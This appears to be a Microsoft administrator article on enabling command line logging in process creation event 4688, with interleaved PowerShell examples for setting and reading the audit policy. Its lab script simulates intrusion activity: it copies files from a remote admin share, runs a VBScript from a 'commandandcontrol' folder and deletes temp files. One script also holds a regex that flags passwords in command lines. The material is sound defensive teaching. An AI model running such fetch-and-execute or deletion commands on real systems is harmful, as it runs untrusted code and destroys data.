Command line process auditing

Applies To: Windows Server 2016, Windows Server 2012 R2

Author: Justin Turner, Senior Support Escalation Engineer with the Windows group

Note

This content is written by a Microsoft customer support engineer, and is intended for experienced administrators and systems architects who are looking for deeper technical explanations of features and solutions in Windows Server 2012 R2 than topics on TechNet usually provide. However, it has not undergone the same editing passes, so some of the language may seem less polished than what is typically found on TechNet.

Overview

  • The pre-existing process creation audit event ID 4688 now includes audit information for command line processes.

  • It also logs the SHA1/2 hash of the executable in the AppLocker event log:

    • Application and Services Logs\Microsoft\Windows\AppLocker
  • You enable it via GPO, but it is disabled by default:

    • "Include command line in process creation events"

Figure 16 Event 4688 (screenshot: Audit command line)

Review the updated event ID 4688 in Figure 16. Prior to this update, none of the information for Process Command Line was logged. Because of this additional logging we can now see not only that the wscript.exe process was started, but also that it was used to execute a VB script.

Configuration

To see the effects of this update, you need to enable two policy settings.

You must have Audit Process Creation auditing enabled to see event ID 4688.

To enable the Audit Process Creation policy, edit the following group policy:

Policy location: Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Configuration > Detailed Tracking

Policy Name: Audit Process Creation

Supported on: Windows 7 and above

Description/Help:

This security policy setting determines whether the operating system generates audit events when a process is created (starts), and records the name of the program or user that created it.

These audit events can help you understand how a computer is being used and track user activity.

Event volume: Low to medium, depending on system usage

Default: Not configured

In order to see the additions to event ID 4688, you must enable the new policy setting: Include command line in process creation events

Table 19 Command line process policy setting

Policy Configuration / Details
Path: Administrative Templates\System\Audit Process Creation
Setting: Include command line in process creation events
Default setting: Not Configured (not enabled)
Supported on: ??
Description: This policy setting determines what information is logged in security audit events when a new process has been created.

This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting, the command line information for every process will be logged in plain text in the security event log as part of the Audit Process Creation event 4688, "a new process has been created," on the workstations and servers on which this policy setting is applied.

If you disable or do not configure this policy setting, the process's command line information will not be included in Audit Process Creation events.

Default: Not configured

Note: When this policy setting is enabled, any user with access to read the security events will be able to read the command line arguments for any successfully created process. Command line arguments can contain sensitive or private information such as passwords or user data.
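As an added example (not from the article, and not the supported deployment method, which remains the two Group Policy settings above), the following PowerShell applies the same two settings on a single machine, for example a lab host or a box you are checking after a GPO refresh. It assumes the standard registry location that the "Include command line in process creation events" Administrative Template writes to and must run from an elevated prompt.

```powershell
# Added example: local equivalent of the two policy settings the article enables via GPO.
# Run elevated. The GPO paths in the article remain the supported way to deploy this at scale.

# 1. Audit Process Creation (success) -- the subcategory that produces event ID 4688.
auditpol.exe /set /subcategory:"Process Creation" /success:enable

# 2. "Include command line in process creation events".
#    Assumption: the Administrative Template stores this under the following key/value
#    (standard location on Windows 8.1 / Server 2012 R2 and later).
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $auditKey)) {
    New-Item -Path $auditKey -Force | Out-Null
}
Set-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord

# 3. Verify the effective state of both settings.
auditpol.exe /get /subcategory:"Process Creation"
Get-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' |
    Select-Object ProcessCreationIncludeCmdLine_Enabled
```

The auditpol /get line shows the effective audit setting, which is what matters if a basic audit policy later overrides the advanced one; a value of 1 for ProcessCreationIncludeCmdLine_Enabled confirms the command line will be written to event 4688 in plain text, so review who can read the Security log before turning it on.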


When you use Advanced Audit Policy Configuration settings, you need to confirm that these settings are not overwritten by basic audit policy settings. Event 4719 is logged when the settings are overwritten.


The following procedure shows how to prevent conflicts by blocking the application of any basic audit policy settings.

To ensure that Advanced Audit Policy Configuration settings are not overwritten


  1. Open the Group Policy Management console.

  2. Right-click Default Domain Policy, and then click Edit.

  3. Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.

  4. Double-click Security Settings, double-click Local Policies, and then click Security Options.

  5. Double-click Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings, and then click Define this policy setting.

  6. Click Enabled, and then click OK.
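As an added example (not from the article), this PowerShell checks the local effect of the procedure above and hunts for the event 4719 entries the article says appear when settings are overwritten. It assumes the security option "Audit: Force audit policy subcategory settings ... to override audit policy category settings" is backed by the SCENoApplyLegacyAuditPolicy value under the Lsa key, and that the Process Creation subcategory GUID is {0CCE922B-69AE-11D9-BED3-505054503030}; both are standard Windows values but are stated here as assumptions.

```powershell
# Added example: confirm subcategory settings override category settings, then list
# recent 4719 (audit policy change) events so you can see if Process Creation was altered.
# Run elevated. Registry value name and subcategory GUID are assumptions noted in the lead-in.

$lsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$valueName = 'SCENoApplyLegacyAuditPolicy'   # assumed backing value for the "Force audit policy subcategory settings" option
$processCreationGuid = '{0CCE922B-69AE-11D9-BED3-505054503030}'   # assumed GUID of the Process Creation subcategory

$current = (Get-ItemProperty -Path $lsaKey -Name $valueName -ErrorAction SilentlyContinue).$valueName
if ($current -ne 1) {
    Write-Warning "Subcategory override is not enforced locally (value = '$current'); basic audit policy can still overwrite it."
} else {
    Write-Output "Subcategory override is enforced (SCENoApplyLegacyAuditPolicy = 1)."
}

# Event 4719 carries the subcategory GUID and the change that was made. Pull the last 7 days
# and flag any change to Process Creation, which is the subcategory 4688 depends on.
$since = (Get-Date).AddDays(-7)
$changes = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4719; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.EventData.Data
        $field = @{}
        foreach ($d in $data) { $field[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ChangedBy   = "$($field['SubjectDomainName'])\$($field['SubjectUserName'])"
            Subcategory = $field['SubcategoryGuid']
            Change      = $field['AuditPolicyChanges']   # resource-string codes, e.g. success auditing added/removed
        }
    }

$changes | Format-Table -AutoSize
$hits = @($changes | Where-Object { $_.Subcategory -eq $processCreationGuid })
if ($hits.Count -gt 0) {
    Write-Warning "$($hits.Count) audit policy change(s) touched Process Creation in the last 7 days; re-check auditpol /get /subcategory:`"Process Creation`"."
}
```

A burst of 4719 events at every Group Policy refresh, alternating the same subcategory on and off, is the classic signature of a basic audit policy fighting an advanced one; enabling the override in step 5 above stops that flapping.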

Additional Resources

Audit Process Creation

Advanced Security Audit Policy Step-by-Step Guide

AppLocker: Frequently Asked Questions

Try This: Explore command line process auditing

  1. Enable Audit Process Creation events and ensure the Advanced Audit Policy configuration is not overwritten.

  2. Create a script that will generate some events of interest and execute the script. Observe the events. The script used to generate the events in the lesson looked like this:

    rem Each line below starts a process, so each produces its own event ID 4688.
    rem The directory created here matches the path the copy and start lines use.
    mkdir c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward
    copy \\192.168.1.254\c$\hidden c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward
    rem Running the .vbs shows up as wscript.exe; only the command line reveals which script ran.
    start C:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward\ntuserrights.vbs
    del c:\systemfiles\temp\*.* /Q
    
  3. Enable the command line process auditing.

  4. Execute the same script as before and observe the events.
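As an added example (not from the article), this PowerShell reads back the 4688 events the exercise produces so you can compare the run before step 3 with the run after it: with the setting off, the Process Command Line field is empty and wscript.exe is all you see; with it on, the .vbs path appears. The field names come from the 4688 event XML; ParentProcessName is an assumption that holds on Windows Server 2016 and is simply blank on 2012 R2. The script needs rights to read the Security log.

```powershell
# Added example: pull recent 4688 events, extract the command line, and show what the
# lesson script produced. Field names are those of the 4688 event XML; ParentProcessName
# is present on Server 2016 and empty on 2012 R2 (assumption stated in the lead-in).
param([int]$Hours = 1)

$since  = (Get-Date).AddHours(-$Hours)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue

$rows = foreach ($e in $events) {
    $field = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $e.TimeCreated
        User        = "$($field['SubjectDomainName'])\$($field['SubjectUserName'])"
        NewProcess  = $field['NewProcessName']
        Parent      = $field['ParentProcessName']
        CommandLine = $field['CommandLine']
    }
}
$rows = @($rows)

# How many events carry no command line? All of them before step 3, none after it.
$missing = @($rows | Where-Object { [string]::IsNullOrEmpty($_.CommandLine) }).Count
Write-Output ("{0} of {1} process-creation events in the last {2} h have no command line recorded." -f $missing, $rows.Count, $Hours)

# The exercise drives cmd.exe, xcopy/copy, wscript.exe and del; show the interpreter
# launches, where the command line is the only thing that names the script.
$rows | Where-Object { $_.NewProcess -match '\\(wscript|cscript|cmd)\.exe$' } |
    Sort-Object Time |
    Format-Table Time, User, NewProcess, CommandLine -Wrap -AutoSize

# The article's note: command lines are logged in plain text. Flag ones that look like
# they carry credentials so you know what the Security log now exposes to its readers.
$rows | Where-Object { $_.CommandLine -match '(?i)(password|passwd|pwd\s*=|/p:|-p\s)' } |
    Select-Object Time, User, NewProcess, CommandLine
```

Run it once after step 2 and again after step 4; the first run reports every event as missing a command line, the second shows wscript.exe followed by the full path to ntuserrights.vbs. The last query is the practical side of the policy's warning: once this is on, anything typed on a command line, including secrets, is readable by every account that can read the Security log.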